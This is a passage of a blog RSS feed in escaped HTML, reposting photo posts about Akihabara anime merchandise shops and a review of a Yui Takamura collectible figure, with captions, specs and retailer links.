alt="9036685857_a554174a6a_o" height="523" src="http://farm4.staticflickr.com/3779/9036685857_a554174a6a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172922"&gt;&lt;img alt="9038911308_6a02d9976d_o" height="523" src="http://farm4.staticflickr.com/3830/9038911308_6a02d9976d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://senran.tv/"&gt;Senran Kagura&lt;/a&gt; goodies.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172923"&gt;&lt;img alt="9036686725_671b4cf979_o" height="930" src="http://farm4.staticflickr.com/3793/9036686725_671b4cf979_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172924"&gt;&lt;img alt="9036687381_24acec417f_o" height="523" src="http://farm6.staticflickr.com/5501/9036687381_24acec417f_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172925"&gt;&lt;img alt="9038913048_f6d4412fc9_o" height="523" src="http://farm4.staticflickr.com/3781/9038913048_f6d4412fc9_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Turn your brolley into a cat with these handle covers.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172926"&gt;&lt;img alt="9038913738_55657f9e5b_o" height="523" src="http://farm4.staticflickr.com/3797/9038913738_55657f9e5b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;More lovely brides to keep you company at home.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172927"&gt;&lt;img alt="9036689157_e08a1fbec9_o" height="523" src="http://farm4.staticflickr.com/3817/9036689157_e08a1fbec9_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Solar powered spinning figure display.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172928"&gt;&lt;img alt="9036689601_44cd8be28b_o" height="523" src="http://farm6.staticflickr.com/5339/9036689601_44cd8be28b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172929"&gt;&lt;img alt="9036690099_563d3ee6bc_o" height="523" src="http://farm8.staticflickr.com/7365/9036690099_563d3ee6bc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Gatcha gatcha.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172930"&gt;&lt;img alt="9036690651_ff99d09974_o" height="523" src="http://farm4.staticflickr.com/3755/9036690651_ff99d09974_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Lovely Cation 2 by &lt;a href="http://www.dannychoo.com/en/post/26586/Iizuki+Tasuku.html"&gt;Iizuki Tasuku-sensei&lt;/a&gt;!&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172931"&gt;&lt;img alt="9038916232_f167da23d8_o" height="523" src="http://farm3.staticflickr.com/2815/9038916232_f167da23d8_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Are you an eroge player? How many you have in your collection?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172932"&gt;&lt;img alt="9036691771_bc40a26568_o" height="523" src="http://farm8.staticflickr.com/7399/9036691771_bc40a26568_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172933"&gt;&lt;img alt="9036692293_7370038eef_o" height="523" src="http://farm4.staticflickr.com/3804/9036692293_7370038eef_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The traditional Japanese souvenirs.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172934"&gt;&lt;img alt="9038917886_f1f317f99c_o" height="523" src="http://farm8.staticflickr.com/7368/9038917886_f1f317f99c_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172935"&gt;&lt;img alt="9036693323_47faf1c207_o" height="930" src="http://farm8.staticflickr.com/7292/9036693323_47faf1c207_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Steins Gate apparel.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172936"&gt;&lt;img alt="9038918916_3785529a06_o" height="523" src="http://farm6.staticflickr.com/5451/9038918916_3785529a06_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;TK421 X 20.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172937"&gt;&lt;img alt="9036694387_6db7fcd58a_o" height="523" src="http://farm6.staticflickr.com/5456/9036694387_6db7fcd58a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Whenever I get CD's, I usually rip them to MP3 and end up sticking the physical CD on the shelf which I never touch again.&lt;br /&gt;&lt;br /&gt;How do you get your music?&lt;br /&gt;This post contains a poll, &lt;a href="http://www.dannychoo.com/en/posts/26961#poll-2655"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172938"&gt;&lt;img alt="9036695027_83634c5233_o" height="523" src="http://farm4.staticflickr.com/3828/9036695027_83634c5233_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Loads of Anime merchandise at the Kotobukiya store.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172939"&gt;&lt;img alt="9038920662_346ef0d50b_o" height="523" src="http://farm8.staticflickr.com/7366/9038920662_346ef0d50b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;K-ON cushion covers.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172940"&gt;&lt;img alt="9038921294_b4206a1d8f_o" height="930" src="http://farm3.staticflickr.com/2817/9038921294_b4206a1d8f_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172941"&gt;&lt;img alt="9038921740_606aea018f_o" height="523" src="http://farm4.staticflickr.com/3694/9038921740_606aea018f_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The chap at the urinal looks like he got 2 dolphins.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172942"&gt;&lt;img alt="9038922170_0e11e980dd_o" height="523" src="http://farm3.staticflickr.com/2858/9038922170_0e11e980dd_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Railgun Girlies.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172943"&gt;&lt;img alt="9038922752_30af30cc60_o" height="523" src="http://farm3.staticflickr.com/2876/9038922752_30af30cc60_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;I love these figures! Check out my review of these lovely ladies - &lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html"&gt;Yui Takamura Off Style Ver&lt;/a&gt; and &lt;a href="http://www.dannychoo.com/en/post/26942/Cryska+Barchenowa+UN+Force+Easy+Jacket.html"&gt;Cryska Barchenowa UN Force Easy Jacket&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172944"&gt;&lt;img alt="9036698127_bb5e6beb8c_o" height="523" src="http://farm6.staticflickr.com/5444/9036698127_bb5e6beb8c_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172945"&gt;&lt;img alt="9038923662_989185963a_o" height="523" src="http://farm4.staticflickr.com/3826/9038923662_989185963a_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Haganai figures.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172946"&gt;&lt;img alt="9038924154_a62867f06b_o" height="523" src="http://farm3.staticflickr.com/2824/9038924154_a62867f06b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Kotobukiya Inia Sestina - Muv-Luv.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172947"&gt;&lt;img alt="9038924614_3ca383defc_o" height="523" src="http://farm3.staticflickr.com/2849/9038924614_3ca383defc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;One day &lt;a href="http://mirai.fm/"&gt;Mirai-chan&lt;/a&gt; will grace one of those billboards.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172948"&gt;&lt;img alt="9038925314_8d0fe9b8f4_o" height="523" src="http://farm8.staticflickr.com/7306/9038925314_8d0fe9b8f4_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172949"&gt;&lt;img alt="9036701059_d7a568aafe_o" height="523" src="http://farm4.staticflickr.com/3806/9036701059_d7a568aafe_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Mirai X Tetsujin.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172950"&gt;&lt;img alt="9038926578_639ea48fe7_o" height="523" src="http://farm4.staticflickr.com/3740/9038926578_639ea48fe7_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;I'm going to use my one to scare off cats that keep leaving their poo on my doorstep.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172951"&gt;&lt;img alt="9036702005_c06c90edcf_o" height="523" src="http://farm8.staticflickr.com/7285/9036702005_c06c90edcf_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;More Shingeki goodies.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172952"&gt;&lt;img alt="9038927708_030bc448e7_o" height="523" src="http://farm6.staticflickr.com/5475/9038927708_030bc448e7_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Which is your fave Tennis Prince?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172953"&gt;&lt;img alt="9036703299_dfe96956ac_o" height="930" src="http://farm6.staticflickr.com/5472/9036703299_dfe96956ac_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172954"&gt;&lt;img alt="9038928952_9d5dbc068e_o" height="523" src="http://farm4.staticflickr.com/3771/9038928952_9d5dbc068e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Two really nice GSC and Max Factory figures soon.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172955"&gt;&lt;img alt="9036704539_20a3fb9c87_o" height="523" src="http://farm8.staticflickr.com/7406/9036704539_20a3fb9c87_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Mikazuki Yozora Nendoroid.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172956"&gt;&lt;img alt="9036705027_a9de81c740_o" height="523" src="http://farm6.staticflickr.com/5338/9036705027_a9de81c740_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Anime stickers. Looking forward to the Girls &amp;amp; Panzer movie.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172957"&gt;&lt;img alt="9036705527_513cfd7fa4_o" height="523" src="http://farm6.staticflickr.com/5535/9036705527_513cfd7fa4_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;You been watching &lt;a href="http://www.dannychoo.com/en/post/26851/Date+A+Live.html"&gt;Date A Live&lt;/a&gt;?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172958"&gt;&lt;img alt="9038930960_a52e2c31ec_o" height="523" src="http://farm6.staticflickr.com/5493/9038930960_a52e2c31ec_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Be one of the Haiyore! Nyaruko-san characters.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172959"&gt;&lt;img alt="9036706453_0a7d6bbc5e_o" height="523" src="http://farm8.staticflickr.com/7384/9036706453_0a7d6bbc5e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Tried the trial version of Soul Sacrifice but didn't quite tickle my fancy.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-FUMyoVdNGjU"&gt;&lt;img alt="" src="http://img.youtube.com/vi/FUMyoVdNGjU/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26961#youtube-FUMyoVdNGjU"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172960"&gt;&lt;img alt="9038931816_5989862733_o" height="523" src="http://farm6.staticflickr.com/5486/9038931816_5989862733_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26700/009+RE+CYBORG.html"&gt;009 RE:CYBORG&lt;/a&gt; - if you watched and waited until the end of the credits then you would have seen me in it ^o^&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172961"&gt;&lt;img alt="9038932332_91de5dd4fb_o" height="523" src="http://farm4.staticflickr.com/3808/9038932332_91de5dd4fb_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Akihabara Electric Town exit - this is the exit you want to get off to see all the hustle and bustle.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_173040"&gt;&lt;img alt="9036707899_b3e2bdf5dc_o" height="523" src="http://farm4.staticflickr.com/3745/9036707899_b3e2bdf5dc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Together with one of my comrades at publishing company &lt;a href="http://www.enterbrain.co.jp/"&gt;Enterbrain&lt;/a&gt; after noms at Akihabara Negishi. Enterbrain do titles like &lt;a href="http://www.famitsu.com/"&gt;Famitsu&lt;/a&gt; and &lt;a href="http://www.techgian.jp/official/tg201307/"&gt;Tech Gian&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Previous installments of Akihabara Shops listed up below.&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26932/Akihabara+Shops+7.html"&gt;Akihabara Shops 7&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26890/Akihabara+Shops+6.html"&gt;Akihabara Shops 6&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26878/Akihabara+Shops+5.html"&gt;Akihabara Shops 5&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26838/Akihabara+Shops+4.html"&gt;Akihabara Shops 4&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26751/Akihabara+Shops+3.html"&gt;Akihabara Shops 3&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26702/Akihabara+Shops+2.html"&gt;Akihabara Shops 2&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26693/Akihabara+Shops.html"&gt;Akihabara Shops&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/posts/tag/akihabarashops/landscape"&gt;View more&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And all Akihabara related posts listed up below.&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26932/Akihabara+Shops+7.html"&gt;Akihabara Shops 7&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26890/Akihabara+Shops+6.html"&gt;Akihabara Shops 6&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26703/Tokyo+Doll+Store+DOLK.html"&gt;Tokyo Doll Store DOLK&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26878/Akihabara+Shops+5.html"&gt;Akihabara Shops 5&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26838/Akihabara+Shops+4.html"&gt;Akihabara Shops 4&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26662/Anime+Cafe.html"&gt;Anime Cafe&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26759/Akihabara+in+the+Winter.html"&gt;Akihabara in the Winter&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26751/Akihabara+Shops+3.html"&gt;Akihabara Shops 3&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26655/CJ+Night+Tokyo+2012+Summer.html"&gt;CJ Night Tokyo 2012 Summer&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26702/Akihabara+Shops+2.html"&gt;Akihabara Shops 2&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/posts/tag/akihabara/landscape"&gt;View more&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And if you are visiting Japan then check out some of the places to visit listed up below.&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26966/Ukishima+cho+Factories.html"&gt;Ukishima-cho Factories&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26939/La+Cittadella+Kawasaki.html"&gt;La Cittadella Kawasaki&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26932/Akihabara+Shops+7.html"&gt;Akihabara Shops 7&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26894/Mitaka.html"&gt;Mitaka&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26889/Roppongi+Photowalk.html"&gt;Roppongi Photowalk&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26890/Akihabara+Shops+6.html"&gt;Akihabara Shops 6&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26829/Kichijoji.html"&gt;Kichijoji&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26879/Asakusa+in+the+Winter.html"&gt;Asakusa in the Winter&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26878/Akihabara+Shops+5.html"&gt;Akihabara Shops 5&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26824/Yokohama+in+the+Winter.html"&gt;Yokohama in the Winter&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/posts/category/visit/landscape"&gt;View more&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26961/Akihabara+Shops+8.html#image_172962"&gt;&lt;img alt="9038933340_2459996eec_o" height="429" src="http://farm6.staticflickr.com/5535/9038933340_2459996eec_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://mirai.fm/"&gt;Read more about Mirai Suenaga &amp;gt;&amp;gt;&amp;gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/akihabara-shops-8.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-7947212700343173011</guid><pubDate>Thu, 20 Jun 2013 19:29:00 +0000</pubDate><atom:updated>2013-06-20T14:29:03.086-05:00</atom:updated><title>Yui Takamura Off Style Ver.</title><description>&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html"&gt;Yui Takamura Off Style Ver.&lt;/a&gt;: &lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172013"&gt;&lt;img alt="8919169149_e50111c000_o" height="523" src="http://farm8.staticflickr.com/7412/8919169149_e50111c000_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Is you being a fan of Muv-Luv Total Eclipse? Is Yui Takamura be tickling your wee fancy? If so then this rather smexy figure of her in "Off Style" is probably for you. &lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt; Product Name: Yui Takamura Off Style Ver. (more details &lt;a href="http://skytube.jp/item/ax0082takamura.html"&gt;at Skytube&lt;/a&gt;)&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Series: &lt;a href="http://www.total-eclipse.jp/te/"&gt;Total Eclipse&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Scale: 1/6&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Material: PVC&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Height: Around 19.5cm&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Spec: Painted&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Sculptor: 2%&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Release Date: April 2013&lt;/li&gt;&lt;br /&gt;&lt;li&gt; Retail Price: &lt;a href="http://finance.yahoo.com/currency/convert?amt=7400&amp;amp;from=JPY&amp;amp;to=USD&amp;amp;submit=Convert"&gt;7,400 yen&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172014"&gt;&lt;img alt="8919786080_7677b6737a_o" height="930" src="http://farm4.staticflickr.com/3826/8919786080_7677b6737a_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;For those who aren't familiar with Yui, you can see her in action below. If the video has been eaten then check out &lt;a href="http://www.youtube.com/results?search_query=muvluv+total+eclipse"&gt;this search query&lt;/a&gt; on YouTube.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26941#youtube-EYJfiq_QZq4"&gt;&lt;img alt="" src="http://img.youtube.com/vi/EYJfiq_QZq4/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26941#youtube-EYJfiq_QZq4"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172015"&gt;&lt;img alt="8919170223_15e7a874b9_o" height="930" src="http://farm6.staticflickr.com/5325/8919170223_15e7a874b9_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Yui was recently released by &lt;a href="http://skytube.jp/item/ax0082takamura.html"&gt;Skytube&lt;/a&gt; and those interested can still order her from one of the following trusted online retailers.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://1999.co.jp/eng/"&gt;http://1999.co.jp/eng/&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://amiami.com/"&gt;http://amiami.com&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://hlj.com/"&gt;http://hlj.com&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://jlist.com/"&gt;http://jlist.com&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://kidnemo.com/"&gt;http://kidnemo.com&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://toylet.net/"&gt;http://toylet.net&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt; &lt;a href="http://www.amazon.co.jp/exec/obidos/ASIN/B009WHZUDE/mitsu-104-22/ref=nosim"&gt;Amazon Japan&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172016"&gt;&lt;img alt="8919170807_4ae187113e_o" height="523" src="http://farm6.staticflickr.com/5328/8919170807_4ae187113e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;What do I love about this sculpt? Its the face - its all about the face!&lt;br /&gt;&lt;br /&gt;I usually pick figures based on their design rather than character and have always done so.&lt;br /&gt;&lt;br /&gt;Yui has a sweet expression followed by nice pose, very clean and well made sculpt and I'm not going to lie - curvy oppai also look lovely too ^o^&lt;br /&gt;&lt;br /&gt;Many folks call me a perv (which is fine) but they dont seem to be able to explain why its OK for the &lt;a href="http://buff.ly/18I7DRH"&gt;many naked statues in Europe&lt;/a&gt; to be displayed in public in front of children - not only that but naked men too flashing their little soldier about.&lt;br /&gt;&lt;br /&gt;An answer I typically get is "but those European statues are art."&lt;br /&gt;&lt;br /&gt;Japanese figures to me are works of art too - who is to judge what art is?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172017"&gt;&lt;img alt="8919788080_b7e8834ee9_o" height="523" src="http://farm8.staticflickr.com/7305/8919788080_b7e8834ee9_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172018"&gt;&lt;img alt="8919172027_0a90c503f2_o" height="523" src="http://farm4.staticflickr.com/3706/8919172027_0a90c503f2_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172019"&gt;&lt;img alt="8919789244_78da783154_o" height="930" src="http://farm3.staticflickr.com/2843/8919789244_78da783154_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Cute pantsu &amp;gt;&amp;lt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172020"&gt;&lt;img alt="8919789774_1041e063dc_o" height="523" src="http://farm9.staticflickr.com/8123/8919789774_1041e063dc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172021"&gt;&lt;img alt="8919790252_0a78db1a4d_o" height="930" src="http://farm8.staticflickr.com/7435/8919790252_0a78db1a4d_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172022"&gt;&lt;img alt="8919174243_7fcd35d14e_o" height="523" src="http://farm4.staticflickr.com/3738/8919174243_7fcd35d14e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172023"&gt;&lt;img alt="8919174777_82c5c46b89_o" height="930" 